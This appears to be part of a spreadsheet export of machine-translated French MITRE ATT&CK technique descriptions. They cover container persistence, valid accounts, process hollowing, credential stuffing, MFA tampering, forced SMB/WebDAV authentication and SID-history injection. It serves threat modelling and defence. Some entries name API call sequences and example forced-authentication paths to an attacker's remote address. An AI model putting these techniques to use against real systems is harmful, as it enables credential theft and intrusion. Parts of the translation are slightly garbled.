Dans les environnements Kubernetes, les DaemonSets permettent à un adversaire de déployer de manière persistante des [Container](https://attack.mitre.org/techniques/T1610) sur tous les nœuds, y compris ceux ajoutés ultérieurement au cluster. (Citation : Attaque Aquasec Kubernetes 2023)(Citation : Kubernetes DaemonSet) Les pods peuvent également être déployés sur des nœuds spécifiques à l’aide des champs 'nodeSelector' ou 'nodeName' dans la spécification du pod.(Citation : Kubernetes Assigning Pods to Nodes)(Citation : AppSecco Kubernetes Namespace Breakout 2020)
Notez que les conteneurs peuvent également être configurés pour s’exécuter en tant que [Systemd Service](https://attack.mitre.org/techniques/T1543/002)s.(Citation : Podman Systemd)(Citation : Docker Systemd)
https://attack.mitre.org/techniques/T1543/005</t>
  </si>
  <si>
    <t>Les adversaires peuvent obtenir et abuser des identifiants de comptes existants comme moyen d’obtenir l’accès initial, la persistance, l’élévation de privilèges ou l’évasion de la défense. Les informations d’identification compromises peuvent être utilisées pour contourner les contrôles d’accès placés sur diverses ressources sur les systèmes au sein du réseau et peuvent même être utilisées pour un accès persistant à des systèmes distants et à des services disponibles en externe, tels que les VPN, Outlook Web Access, les périphériques réseau et le bureau à distance. (Référence : volexity_0day_sophos_FW) Les informations d’identification compromises peuvent également accorder à un adversaire des privilèges accrus sur des systèmes spécifiques ou un accès à des zones restreintes du réseau. Les adversaires peuvent choisir de ne pas utiliser de logiciels malveillants ou d’outils en conjonction avec l’accès légitime que ces informations d’identification fournissent, afin de rendre plus difficile la détection de leur présence.
Dans certains cas, les adversaires peuvent abuser des comptes inactifs : par exemple, ceux appartenant à des personnes qui ne font plus partie d’une organisation. L’utilisation de ces comptes peut permettre à l’adversaire d’échapper à la détection, car l’utilisateur du compte d’origine ne sera pas présent pour identifier toute activité anormale se déroulant sur son compte. (Citation : CISA MFA PrintNightmare)
Le chevauchement des autorisations pour les comptes locaux, de domaine et de cloud sur un réseau de systèmes est préoccupant, car l’adversaire peut être en mesure de pivoter entre les comptes et les systèmes pour atteindre un niveau d’accès élevé (c’est-à-dire un administrateur de domaine ou d’entreprise) afin de contourner les contrôles d’accès définis au sein de l’entreprise. (Citation : Vol d’informations d’identification TechNet)
https://attack.mitre.org/techniques/T1078</t>
  </si>
  <si>
    <t>Les adversaires peuvent communiquer à l’aide d’un protocole et d’un appariement de ports qui ne sont généralement pas associés. Par exemple, HTTPS sur le port 8088 (Citation : Symantec Elfin mars 2019) ou le port 587 (Citation : Fortinet Agent Tesla avril 2018) par opposition au port traditionnel 443. Les adversaires peuvent apporter des modifications au port standard utilisé par un protocole pour contourner le filtrage ou brouiller l’analyse/l’analyse des données réseau.
Les adversaires peuvent également apporter des modifications aux systèmes victimes pour abuser des ports non standard. Par exemple, les clés de registre et d’autres paramètres de configuration peuvent être utilisés pour modifier les appariements de protocoles et de ports. (Référence : change_rdp_port_conti)
https://attack.mitre.org/techniques/T1571</t>
  </si>
  <si>
    <t>Les adversaires peuvent créer et cultiver des comptes de médias sociaux qui peuvent être utilisés lors du ciblage. Les adversaires peuvent créer des comptes de médias sociaux qui peuvent être utilisés pour créer un persona afin de faire avancer les opérations. Le développement d’un persona consiste en l’élaboration d’informations publiques, de présence, d’histoire et d’affiliations appropriées. (Référence : NEWSCASTER2014)(Citation : BlackHatRobinSage)
Pour les opérations intégrant l’ingénierie sociale, l’utilisation d’un persona sur les médias sociaux peut être importante. Ces personnages peuvent être fictifs ou se faire passer pour de vraies personnes. Le persona peut exister sur un seul site de médias sociaux ou sur plusieurs sites (ex : Facebook, LinkedIn, Twitter, etc.). L’établissement d’un persona sur les médias sociaux peut nécessiter l’élaboration d’une documentation supplémentaire pour le faire paraître réel. Il peut s’agir de remplir des informations de profil, de développer des réseaux sociaux ou d’incorporer des photos. 
Une fois qu’un persona a été développé, un adversaire peut l’utiliser pour créer des liens avec des cibles d’intérêt. Ces connexions peuvent être directes ou inclure d’essayer de se connecter par l’intermédiaire d’autres personnes. (Référence : NEWSCASTER2014)(Citation : BlackHatRobinSage) Ces comptes peuvent être exploités au cours d’autres phases du cycle de vie de l’adversaire, par exemple lors de l’accès initial (ex : [Spearphishing via le Service](https://attack.mitre.org/techniques/T1566/003)).
https://attack.mitre.org/techniques/T1585/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent injecter du code malveillant dans des processus suspendus et vidés afin d’échapper aux défenses basées sur les processus. Le vidage de processus est une méthode d’exécution de code arbitraire dans l’espace d’adressage d’un processus en direct distinct.  
L’évidement de processus est généralement effectué en créant un processus dans un état suspendu, puis en démappant/vidant sa mémoire, qui peut ensuite être remplacée par un code malveillant. Un processus victime peut être créé à l’aide d’appels d’API Windows natifs, tels que &lt;code&gt;CreateProcess&lt;/code&gt;, qui inclut un indicateur permettant de suspendre le thread principal du processus. À ce stade, le processus peut être démappé à l’aide d’appels d’API tels que &lt;code&gt;ZwUnmapViewOfSection&lt;/code&gt; ou &lt;code&gt;NtUnmapViewOfSection&lt;/code&gt; avant d’être écrit, réaligné sur le code injecté et repris via &lt;code&gt;VirtualAllocEx&lt;/code&gt;, &lt;code&gt;WriteProcessMemory&lt;/code&gt;, &lt;code&gt;SetThreadContext&lt;/code&gt;, puis &lt;code&gt;ResumeThread&lt;/code&gt; respectivement. (Citation : Leitch Hollowing)(Citation : Injection de processus élastique juillet 2017)
Ceci est très similaire à [Thread Local Storage](https://attack.mitre.org/techniques/T1055/005), mais crée un nouveau processus plutôt que de cibler un processus existant. Ce comportement n’entraînera probablement pas de privilèges élevés, car le processus injecté a été généré à partir du processus d’injection (et hérite donc du contexte de sécurité). Cependant, l’exécution via l’évidement du processus peut également échapper à la détection des produits de sécurité, car l’exécution est masquée par un processus légitime.
https://attack.mitre.org/techniques/T1055/012</t>
  </si>
  <si>
    <t>Les adversaires peuvent exploiter les vulnérabilités logicielles dans le but d’élever leurs privilèges. L’exploitation d’une vulnérabilité logicielle se produit lorsqu’un adversaire profite d’une erreur de programmation dans un programme, un service ou dans le logiciel ou le noyau du système d’exploitation lui-même pour exécuter du code contrôlé par l’adversaire. Les constructions de sécurité telles que les niveaux d’autorisation entravent souvent l’accès aux informations et l’utilisation de certaines techniques, de sorte que les adversaires devront probablement procéder à une élévation de privilèges pour inclure l’utilisation d’une exploitation logicielle pour contourner ces restrictions.
Lorsqu’il accède initialement à un système, un adversaire peut opérer dans le cadre d’un processus à privilèges inférieurs, ce qui l’empêche d’accéder à certaines ressources du système. Des vulnérabilités peuvent exister, généralement dans les composants du système d’exploitation et les logiciels fonctionnant généralement avec des autorisations plus élevées, qui peuvent être exploitées pour obtenir des niveaux d’accès plus élevés sur le système. Cela peut permettre à quelqu’un de passer d’autorisations non privilégiées ou de niveau utilisateur à des autorisations SYSTEM ou root en fonction du composant vulnérable. Cela peut également permettre à un adversaire de passer d’un environnement virtualisé, par exemple au sein d’une machine virtuelle ou d’un conteneur, à l’hôte sous-jacent. Il peut s’agir d’une étape nécessaire pour un adversaire compromettant un système de point de terminaison correctement configuré et limitant les autres méthodes d’élévation de privilèges.
Les adversaires peuvent introduire un pilote vulnérable signé sur une machine compromise afin d’exploiter la vulnérabilité pour exécuter du code en mode noyau. Ce processus est parfois appelé Bring Your Own Vulnerable Driver (BYOVD). (Citation : ESET InvisiMole, juin 2020)(Citation : Unit42 AcidBox, juin 2020) Les adversaires peuvent inclure le pilote vulnérable avec des fichiers livrés lors de l’accès initial ou les télécharger sur un système compromis via [Transfert d’outil d’entrée](https://attack.mitre.org/techniques/T1105) ou [Transfert d’outil latéral](https://attack.mitre.org/techniques/T1570).
https://attack.mitre.org/techniques/T1068</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser des fourches de ressources pour masquer des codes malveillants ou des exécutables afin d’échapper à la détection et de contourner les applications de sécurité. Une fourche de ressources fournit aux applications un moyen structuré de stocker des ressources telles que des images miniatures, des définitions de menu, des icônes, des boîtes de dialogue et du code. (Citation : Présentation du système de fichiers hiérarchique macOS) L’utilisation d’une fourche de ressource est identifiable lors de l’affichage des attributs étendus d’un fichier, à &lt;code&gt;l’aide des commandes ls -l@&lt;/code&gt; ou &lt;code&gt;xattr -l&lt;/code&gt;. Les fourches de ressources ont été déconseillées et remplacées par la structure de bundle d’applications. Les ressources non localisées sont placées dans le répertoire de niveau supérieur d’un bundle d’applications, tandis que les ressources localisées sont placées dans le dossier &lt;code&gt;/Resources&lt;/code&gt;. (Citation : Fourches de ressources et de données)(Citation : Attributs étendus ELC)
Les adversaires peuvent utiliser des fourches de ressources pour masquer des données malveillantes qui pourraient autrement être stockées directement dans des fichiers. Les adversaires peuvent exécuter du contenu avec une fourche de ressources attachée, à un décalage spécifié, qui est déplacé vers un emplacement exécutable puis appelé. Le contenu de la fourche de ressource peut également être obfusqué/chiffré jusqu’à l’exécution. (Citation : ressource sentinellabs nommée fork 2020)(Citation : tau bundlore erika noerenberg 2020)
https://attack.mitre.org/techniques/T1564/009</t>
  </si>
  <si>
    <t>Les adversaires peuvent interrompre la disponibilité des ressources système et réseau en inhibant l’accès aux comptes utilisés par des utilisateurs légitimes. Les comptes peuvent être supprimés, verrouillés ou manipulés (par exemple, des informations d’identification modifiées) pour supprimer l’accès aux comptes. Les adversaires peuvent également se déconnecter et/ou effectuer un [Arrêt/Redémarrage du système](https://attack.mitre.org/techniques/T1529) pour mettre en place des modifications malveillantes. (Citation : Casier CarbonBlackGoga 2019)(Citation : Unit42 LockerGoga 2019)
Sous Windows, l’utilitaire [Net](https://attack.mitre.org/software/S0039), les applets de commande &lt;code&gt;Set-LocalUser&lt;/code&gt; et &lt;code&gt;Set-ADAccountPassword&lt;/code&gt; [PowerShell](https://attack.mitre.org/techniques/T1059/001) peuvent être utilisées par des adversaires pour modifier des comptes d’utilisateurs. Sous Linux, l’utilitaire &lt;code&gt;passwd&lt;/code&gt; peut être utilisé pour changer les mots de passe. Les comptes peuvent également être désactivés par la stratégie de groupe. 
Les adversaires qui utilisent un ransomware ou des attaques similaires peuvent d’abord effectuer ce comportement et d’autres comportements d’impact, tels que [Destruction de données](https://attack.mitre.org/techniques/T1485) et [Défiguration](https://attack.mitre.org/techniques/T1491), afin d’entraver la réponse/récupération d’incident avant d’avoir atteint l’objectif [Données chiffrées pour impact](https://attack.mitre.org/techniques/T1486).
https://attack.mitre.org/techniques/T1531</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser les informations d’identification obtenues à partir de vidages de violations de comptes non liés pour accéder aux comptes cibles par le biais du chevauchement des informations d’identification. Parfois, un grand nombre de paires de noms d’utilisateur et de mots de passe sont mises en ligne lorsqu’un site Web ou un service est compromis et que les informations d’identification du compte utilisateur sont consultées. Ces informations peuvent être utiles à un adversaire qui tente de compromettre des comptes en profitant de la tendance des utilisateurs à utiliser les mêmes mots de passe pour leurs comptes personnels et professionnels.
Le credential stuffing est une option risquée, car il peut entraîner de nombreux échecs d’authentification et de verrouillage de compte, en fonction des politiques d’échec de connexion de l’organisation.
En règle générale, les services de gestion sur les ports couramment utilisés sont utilisés lors du remplissage des informations d’identification. Les services les plus souvent ciblés sont les suivants :
* SSH (22/TCP)
* Telnet (23/TCP)
* FTP (21/TCP)
* NetBIOS / SMB / Samba (139/TCP et 445/TCP)
* LDAP (389/TCP)
* Kerberos (88/TCP)
* RDP / Terminal Services (3389/TCP)
* Services de gestion HTTP/HTTP (80/TCP et 443/TCP)
* MSSQL (1433/TCP)
* Oracle (1521/TCP)
* MySQL (3306/TCP)
* VNC (5900/TCP)
Outre les services de gestion, les adversaires peuvent « cibler l’authentification unique (SSO) et les applications basées sur le cloud à l’aide de protocoles d’authentification fédérés », ainsi que les applications de messagerie externes, telles qu’Office 365. (Référence : US-CERT TA18-068A 2018)
https://attack.mitre.org/techniques/T1110/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de rendre un exécutable ou un fichier difficile à découvrir ou à analyser en chiffrant, encodant ou obscurcissant son contenu sur le système ou en transit. Il s’agit d’un comportement courant qui peut être utilisé sur différentes plateformes et sur le réseau pour échapper aux défenses. 
Les charges utiles peuvent être compressées, archivées ou chiffrées afin d’éviter d’être détectées. Ces charges utiles peuvent être utilisées lors de l’accès initial ou ultérieurement pour atténuer la détection. Parfois, l’action d’un utilisateur peut être nécessaire pour ouvrir et [Débrouiller/Décoder des fichiers ou des informations](https://attack.mitre.org/techniques/T1140) pour [Exécution par l’utilisateur](https://attack.mitre.org/techniques/T1204). L’utilisateur peut également être tenu de saisir un mot de passe pour ouvrir un fichier compressé/chiffré protégé par un mot de passe qui a été fourni par l’adversaire. (Citation : Volexity PowerDuke, novembre 2016) Les adversaires peuvent également utiliser des scripts compressés ou archivés, tels que JavaScript. 
Des parties de fichiers peuvent également être encodées pour masquer les chaînes de texte brut qui aideraient autrement les défenseurs à la découverte. (Citation : Linux/Cdorked.A Analyse de sécurité We Live) Les charges utiles peuvent également être divisées en fichiers distincts, apparemment inoffensifs, qui ne révèlent des fonctionnalités malveillantes que lorsqu’ils sont réassemblés. (Citation : Obfuscation du noir de carbone septembre 2016)
Les adversaires peuvent également abuser de [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010) pour masquer des commandes exécutées à partir de charges utiles ou directement via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Les variables d’environnement, les alias, les caractères et d’autres sémantiques spécifiques à la plate-forme ou au langage peuvent être utilisés pour échapper aux détections basées sur les signatures et aux mécanismes de contrôle des applications. (Référence : FireEye Obfuscation juin 2017) (Référence : FireEye Revoke-Obfuscation juillet 2017)(Citation : PaloAlto EncodedCommand mars 2017)
https://attack.mitre.org/techniques/T1027</t>
  </si>
  <si>
    <t>Les adversaires peuvent désactiver ou modifier les mécanismes d’authentification multifacteur (MFA) pour permettre un accès persistant aux comptes compromis.
Une fois que les adversaires ont accédé à un réseau en compromettant un compte sans MFA ou en utilisant une méthode de contournement MFA telle que la [Multi-Factor Authentication Request Generation](https://attack.mitre.org/techniques/T1621), les adversaires peuvent exploiter leur accès pour modifier ou désactiver complètement les défenses MFA. Cela peut se faire en abusant des fonctionnalités légitimes, telles que l’exclusion d’utilisateurs des stratégies d’accès conditionnel Azure AD, l’inscription d’une nouvelle méthode MFA mais vulnérable/contrôlée par l’adversaire ou en corrigeant manuellement les programmes MFA et les fichiers de configuration pour contourner les fonctionnalités attendues. (Référence : Mandiant APT42)(Référence : Exclusions de l’accès conditionnel Azure AD)
Par exemple, la modification du fichier hosts Windows ('C :\windows\system32\drivers\etc\hosts') pour rediriger les appels MFA vers localhost au lieu d’un serveur MFA peut entraîner l’échec du processus MFA. Si une politique d'« échec d’ouverture » est en place, toute tentative d’authentification réussie peut se voir accorder l’accès sans appliquer l’authentification multifacteur. (Citation : Les Russes exploitent le protocole MFA par défaut - CISA mars 2022) 
En fonction de l’étendue, des objectifs et des privilèges de l’adversaire, les défenses MFA peuvent être désactivées pour des comptes individuels ou pour tous les comptes liés à un groupe plus important, tels que tous les comptes de domaine dans l’environnement réseau d’une victime. (Citation : Les Russes exploitent le protocole MFA par défaut - CISA mars 2022)
https://attack.mitre.org/techniques/T1556/006</t>
  </si>
  <si>
    <t>Les adversaires peuvent cibler un serveur Exchange, Office 365 ou Google Workspace pour collecter des informations sensibles. Les adversaires peuvent exploiter les informations d’identification d’un utilisateur et interagir directement avec le serveur Exchange pour acquérir des informations au sein d’un réseau. Les adversaires peuvent également accéder aux services Exchange externes, à Office 365 ou à Google Workspace pour accéder à la messagerie électronique à l’aide d’informations d’identification ou de jetons d’accès. Des outils tels que [MailSniper](https://attack.mitre.org/software/S0413) peuvent être utilisés pour automatiser les recherches de mots-clés spécifiques.
https://attack.mitre.org/techniques/T1114/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent installer des composants malveillants qui s’exécutent sur les serveurs Web IIS (Internet Information Services) pour établir la persistance. IIS fournit plusieurs mécanismes pour étendre les fonctionnalités des serveurs Web. Par exemple, des extensions et des filtres ISAPI (Internet Server Application Programming Interface) peuvent être installés pour examiner et/ou modifier les requêtes Web IIS entrantes et sortantes. Les extensions et les filtres sont déployés sous forme de fichiers DLL qui exportent trois fonctions : &lt;code&gt;Get{Extension/Filter}Version&lt;/code&gt;, &lt;code&gt;Http{Extension/Filter}Proc&lt;/code&gt; et (éventuellement) &lt;code&gt;Terminate{Extension/Filter}&lt;/code&gt;. Des modules IIS peuvent également être installés pour étendre les serveurs Web IIS. (Citation : Présentation de l’extension Microsoft ISAPI 2017)(Citation : Présentation du filtre Microsoft ISAPI 2017)(Citation : IIS Backdoor 2011)(Citation : Trustwave IIS Module 2013)
Les adversaires peuvent installer des extensions et des filtres ISAPI malveillants pour observer et/ou modifier le trafic, exécuter des commandes sur des machines compromises ou commander et contrôler le trafic par proxy. Les extensions et les filtres ISAPI peuvent avoir accès à toutes les requêtes et réponses Web IIS. Par exemple, un adversaire peut abuser de ces mécanismes pour modifier les réponses HTTP afin de distribuer des commandes/contenus malveillants à des hôtes précédemment composés. (Citation : Présentation du filtre Microsoft ISAPI 2017)(Citation : Présentation de l’extension Microsoft ISAPI 2017)(Citation : Microsoft ISAPI Extension All Incoming 2017)(Référence : Dell TG-3390)(Citation : Trustwave IIS Module 2013)(Citation : MMPC ISAPI Filter 2012)
Les adversaires peuvent également installer des modules IIS malveillants pour observer et/ou modifier le trafic. IIS 7.0 a introduit des modules qui offrent le même accès illimité aux requêtes et réponses HTTP que les extensions et les filtres ISAPI. Les modules IIS peuvent être écrits sous la forme d’une DLL qui exporte &lt;code&gt;RegisterModule&lt;/code&gt;, ou d’une application .NET qui s’interface avec ASP.NET API pour accéder aux requêtes HTTP IIS. (Citation : Présentation des modules Microsoft IIS 2007)(Citation : Trustwave IIS Module 2013)(Citation : ESET IIS Malware 2021)
https://attack.mitre.org/techniques/T1505/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter d’imiter les caractéristiques de signatures de code valides pour augmenter les chances de tromper un utilisateur, un analyste ou un outil. La signature de code fournit un niveau d’authenticité sur un binaire de la part du développeur et une garantie que le binaire n’a pas été altéré. Les adversaires peuvent copier les métadonnées et les informations de signature d’un programme signé, puis les utiliser comme modèle pour un programme non signé. Les fichiers avec des signatures de code non valides échoueront aux contrôles de validation des signatures numériques, mais ils peuvent sembler plus légitimes aux utilisateurs et les outils de sécurité peuvent mal gérer ces fichiers. (Citation : Threatexpress MetaTwin 2017)
Contrairement à [Code Signing](https://attack.mitre.org/techniques/T1553/002), cette activité n’aboutira pas à une signature valide.
https://attack.mitre.org/techniques/T1036/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent effectuer des opérations malveillantes à l’aide d’une instance virtuelle pour éviter d’être détectés. Il existe une grande variété de technologies de virtualisation qui permettent l’émulation d’un ordinateur ou d’un environnement informatique. En exécutant un code malveillant à l’intérieur d’une instance virtuelle, les adversaires peuvent masquer les artefacts associés à leur comportement aux outils de sécurité qui ne sont pas en mesure de surveiller l’activité à l’intérieur de l’instance virtuelle. De plus, selon l’implémentation de la mise en réseau virtuelle (par exemple, un adaptateur ponté), il peut être difficile de retracer le trafic réseau généré par l’instance virtuelle jusqu’à l’hôte compromis, car l’adresse IP et le nom d’hôte peuvent ne pas correspondre aux valeurs connues. (Citation : SingHealth Breach janvier 2019)
Les adversaires peuvent utiliser la prise en charge native de la virtualisation (par exemple, Hyper-V) ou déposer les fichiers nécessaires à l’exécution d’une instance virtuelle (par exemple, les binaires VirtualBox). Après l’exécution d’une instance virtuelle, les adversaires peuvent créer un dossier partagé entre l’invité et l’hôte avec des autorisations qui permettent à l’instance virtuelle d’interagir avec le système de fichiers de l’hôte. (Citation : Sophos Ragnar mai 2020)
https://attack.mitre.org/techniques/T1564/006</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser du code polymorphe (également appelé code métamorphique ou mutant) pour échapper à la détection. Le code polymorphe est un type de logiciel capable de modifier son empreinte d’exécution lors de l’exécution du code. (Citation : polymorphe-mûre) À chaque exécution du logiciel, le code est muté en une version différente de lui-même qui atteint le même but ou objectif que l’original. Cette fonctionnalité permet au logiciel malveillant d’échapper aux défenses traditionnelles basées sur les signatures, telles que les outils antivirus et anti-programme malveillant. (Citation : polymorphe-sentinelone) 
D’autres techniques d’obfuscation peuvent être utilisées conjointement avec du code polymorphe pour obtenir les effets escomptés, notamment l’utilisation de moteurs de mutation pour effectuer des actions telles que [Software Packing](https://attack.mitre.org/techniques/T1027/002), [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010) ou [Encrypted/Encoded File](https://attack.mitre.org/techniques/T1027/013). (Citation : polymorphic-linkedin)(Citation : polymorphe-medium)
https://attack.mitre.org/techniques/T1027/014</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter d’accéder à des informations détaillées sur la politique de mot de passe utilisée dans un réseau d’entreprise ou un environnement cloud. Les politiques de mot de passe sont un moyen d’imposer des mots de passe complexes difficiles à deviner ou à déchiffrer par [force brute](https://attack.mitre.org/techniques/T1110). Ces informations peuvent aider l’adversaire à créer une liste de mots de passe courants et à lancer des attaques par dictionnaire et/ou par force brute qui adhèrent à la politique (par exemple, si la longueur minimale du mot de passe doit être de 8, ne pas essayer de mots de passe tels que « pass123 » ; ne pas vérifier plus de 3 ou 4 mots de passe par compte si le verrouillage est défini à 6 pour ne pas verrouiller les comptes).
Les politiques de mot de passe peuvent être définies et découvertes sur les systèmes Windows, Linux et macOS via divers utilitaires de commande shell tels que &lt;code&gt;net accounts (/domain),&lt;/code&gt; &lt;code&gt;Get-ADDefaultDomainPasswordPolicy&lt;/code&gt;, &lt;code&gt;chage -l &lt;username&gt;&lt;/code&gt;, &lt;code&gt;cat /etc/pam.d/common-password&lt;/code&gt; et &lt;code&gt;pwpolicy getaccountpolicies&lt;/code&gt; (Citation : Politiques de mot de passe Linux Superuser) (Référence : Politiques de mot de passe utilisateur Jamf). Les adversaires peuvent également exploiter une [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) sur les périphériques réseau pour découvrir des informations sur la politique de mot de passe (par exemple, &lt;code&gt;show aaa&lt;/code&gt;, &lt;code&gt;show aaa common-criteria policy all&lt;/code&gt;). (Référence : US-CERT-TA18-106A)
Les politiques de mot de passe peuvent être découvertes dans les environnements cloud à l’aide d’API disponibles telles que &lt;code&gt;GetAccountPasswordPolicy&lt;/code&gt; dans AWS (Référence : AWS GetPasswordPolicy).
https://attack.mitre.org/techniques/T1201</t>
  </si>
  <si>
    <t>Les adversaires peuvent établir une persistance et/ou élever des privilèges à l’aide de mécanismes système qui déclenchent l’exécution en fonction d’événements spécifiques. Divers systèmes d’exploitation permettent de surveiller et de s’abonner à des événements tels que les ouvertures de session ou d’autres activités de l’utilisateur, telles que l’exécution d’applications/binaires spécifiques. Les environnements cloud peuvent également prendre en charge diverses fonctions et services qui surveillent et peuvent être invoqués en réponse à des événements cloud spécifiques. (Citation : Porte dérobée d’un compte AWS)(citation : Varonis Power Automate Data Exfiltration)(Référence : Rapport de cas Microsoft DART 001)
Les adversaires peuvent abuser de ces mécanismes pour maintenir un accès persistant à une victime en exécutant à plusieurs reprises un code malveillant. Après avoir accédé au système d’une victime, les adversaires peuvent créer/modifier des déclencheurs d’événements pour pointer vers du contenu malveillant qui sera exécuté chaque fois que le déclencheur d’événement est appelé. (Référence : FireEye WMI 2015)(Citation : Persistance des logiciels malveillants sur OS X)(Citation : logiciel malveillant d’amnésie)
Étant donné que l’exécution peut être procurée par un compte disposant d’autorisations plus élevées, tel que des comptes SYSTEM ou de service, un adversaire peut être en mesure d’abuser de ces mécanismes d’exécution déclenchés pour élever ses privilèges.
https://attack.mitre.org/techniques/T1546</t>
  </si>
  <si>
    <t>Les adversaires peuvent collecter des informations d’identification en invoquant ou en forçant un utilisateur à fournir automatiquement des informations d’authentification par le biais d’un mécanisme qu’ils peuvent intercepter.
Le protocole SMB (Server Message Block) est couramment utilisé dans les réseaux Windows pour l’authentification et la communication entre les systèmes pour l’accès aux ressources et le partage de fichiers. Lorsqu’un système Windows tente de se connecter à une ressource SMB, il tente automatiquement de s’authentifier et d’envoyer les informations d’identification de l’utilisateur actuel au système distant. (citation : Blocage des messages du serveur Wikipédia) Ce comportement est typique dans les environnements d’entreprise, de sorte que les utilisateurs n’ont pas besoin d’entrer d’informations d’identification pour accéder aux ressources réseau.
WebDAV (Web Distributed Authoring and Versioning) est également généralement utilisé par les systèmes Windows comme protocole de sauvegarde lorsque SMB est bloqué ou échoue. WebDAV est une extension de HTTP et fonctionne généralement sur les ports TCP 80 et 443. (Citation : Didier Stevens WebDAV Traffic) (Citation : Microsoft gère la sécurité WebDAV)
Les adversaires peuvent tirer parti de ce comportement pour accéder aux hachages de compte utilisateur via l’authentification forcée SMB/WebDAV. Un adversaire peut envoyer une pièce jointe à un utilisateur par le biais du spearphishing qui contient un lien de ressource vers un serveur externe contrôlé par l’adversaire (c’est-à-dire [Template Injection](https://attack.mitre.org/techniques/T1221)), ou placer un fichier spécialement conçu sur le chemin de navigation pour les comptes privilégiés (par exemple. SCF placé sur le bureau) ou sur un partage accessible au public pour être accessible par la ou les victimes. Lorsque le système de l’utilisateur accède à la ressource non approuvée, il tente de s’authentifier et envoie des informations, y compris les informations d’identification hachées de l’utilisateur, via SMB au serveur contrôlé par l’adversaire. (Citation : GitHub Hashjacking) En accédant au hachage des informations d’identification, un adversaire peut effectuer un craquage hors ligne [Brute Force](https://attack.mitre.org/techniques/T1110) pour accéder aux informations d’identification en texte brut. (Citation : Cylance Rediriger vers SMB)
Cela peut se produire de plusieurs manières. (Citation : Osanda vole des hachages NetNTLM) Voici quelques spécificités de l’utilisation dans la nature :
* Une pièce jointe de spearphishing contenant un document avec une ressource qui est automatiquement chargée lors de l’ouverture du document (c’est-à-dire [Template Injection](https://attack.mitre.org/techniques/T1221)). Le document peut inclure, par exemple, une requête similaire à &lt;code&gt;file[ :]//[remote address]/Normal.dotm&lt;/code&gt; pour déclencher la requête SMB. (Citation : US-CERT APT Energy Oct 2017)
* A modifié . LNK ou . SCF avec l’icône nom de fichier pointant vers une référence externe telle que &lt;code&gt;\\[adresse distante]\pic.png&lt;/code&gt; qui forcera le système à charger la ressource lorsque l’icône est affichée pour collecter à plusieurs reprises les informations d’identification. (Citation : US-CERT APT Energy Oct 2017)
https://attack.mitre.org/techniques/T1187</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser l’injection d’historique SID pour élever les privilèges et contourner les contrôles d’accès. L’identificateur de sécurité Windows (SID) est une valeur unique qui identifie un compte d’utilisateur ou de groupe. Les SID sont utilisés par la sécurité Windows à la fois dans les descripteurs de sécurité et les jetons d’accès. (Citation : Microsoft SID) Un compte peut contenir des SID supplémentaires dans l’attribut Active Directory SID-History (Citation : Microsoft SID-History Attribute), ce qui permet une migration de compte interopérable entre les domaines (par exemple, toutes les valeurs de SID-History sont incluses dans les jetons d’accès).
Avec des droits d’administrateur de domaine (ou équivalents), les valeurs SID récoltées ou bien connues (Citation : Microsoft Well Known SIDs juin 2017) peuvent être insérées dans l’historique SID pour permettre l’emprunt d’identité d’utilisateurs/groupes arbitraires tels que les administrateurs d’entreprise. Cette manipulation peut entraîner un accès élevé aux ressources locales et/ou à des domaines autrement inaccessibles via des techniques de déplacement latéral telles que [Services à distance](https://attack.mitre.org/techniques/T1021), [Partages SMB/Windows Admin](https://attack.mitre.org/techniques/T1021/002) ou [Gestion à distance Windows](https://attack.mitre.org/techniques/T1021/006).
https://attack.mitre.org/techniques/T1134/005</t>
  </si>
  <si>
    <t>Les adversaires peuvent franchir les limites du réseau en compromettant les périphériques réseau de périmètre ou les périphériques internes responsables de la segmentation du réseau. La violation de ces appareils peut permettre à un adversaire de contourner les restrictions sur le routage du trafic qui séparent autrement les réseaux approuvés et non approuvés.
Des périphériques tels que des routeurs et des pare-feu peuvent être utilisés pour créer des limites entre les réseaux approuvés et non approuvés.  Pour ce faire, ils restreignent les types de trafic afin d’appliquer la politique organisationnelle afin de réduire le risque inhérent à de telles connexions.  La restriction du trafic peut être obtenue en interdisant les adresses IP, les ports de protocole de couche 4 ou par une inspection approfondie des paquets pour identifier les applications.  Pour participer avec le reste du réseau, ces appareils peuvent être directement adressables ou transparents, mais leur mode de fonctionnement n’a aucune incidence sur la façon dont l’adversaire peut les contourner lorsqu’ils sont compromis.
Lorsqu’un adversaire prend le contrôle d’un tel périphérique de frontière, il peut contourner l’application de sa politique pour faire passer le trafic normalement interdit au-delà de la limite de confiance entre les deux réseaux séparés sans entrave.  En obtenant suffisamment de droits sur l’appareil, un adversaire peut reconfigurer l’appareil pour autoriser le trafic qu’il souhaite, ce qui lui permet ensuite d’atteindre des objectifs tels que la commande et le contrôle via [Proxy multi-sauts](https://attack.mitre.org/techniques/T1090/003) ou l’exfiltration de données via [Duplication de trafic](https://attack.mitre.org/techniques/T1020/001). Les adversaires peuvent également cibler les appareils internes responsables de la segmentation du réseau et les abuser en conjonction avec le [Proxy interne](https://attack.mitre.org/techniques/T1090/001) pour atteindre les mêmes objectifs. (Citation : Kaspersky ThreatNeedle février 2021)  Dans les cas où un dispositif frontalier sépare deux organisations distinctes, l’adversaire peut également faciliter les mouvements latéraux vers de nouveaux environnements de victime.
https://attack.mitre.org/techniques/T1599</t>
  </si>
  <si>
